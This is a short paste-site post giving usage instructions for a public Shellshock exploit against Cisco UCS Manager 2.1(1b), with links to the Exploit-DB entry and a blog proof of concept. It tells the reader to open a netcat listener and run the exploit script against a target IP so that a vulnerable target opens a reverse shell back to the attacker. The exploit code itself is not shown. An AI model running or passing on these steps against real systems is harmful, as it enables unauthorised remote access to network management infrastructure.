Toggle navigation
Home
Latest pastes
FAQ
Random
BitBin is shutting down!
Register
Login
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
SUBMITTED BY:
sahertian
DATE:
June 19, 2016, 11:47 a.m.
FORMAT:
Text only
SIZE:
592 Bytes
Raw
Download
Tweet
HITS:
632
Go to comments
Report
I try this based on thatchrisecker. exploit at Exploit-DB.
You can find the exploit here https://www.exploit-db.com/exploits/39568/
The command
Run netcut on your machine
# nc -lvp <listening port>
Run exploit and pointing to your netcut ip and listening port
# python cisco-uscm.py <target ip> <your ip> <your listening port>
If your target is vulnerable, you'll get connection form target ip to your netcut listening port
The picture and proof of concept you can see on my blog https://evilc0de.blogspot.com/2016/03/cisco-ucs-manager-211b-shellshock.html
Thank you :)
Please enable JavaScript to view the
comments powered by Disqus.
comments powered by
Disqus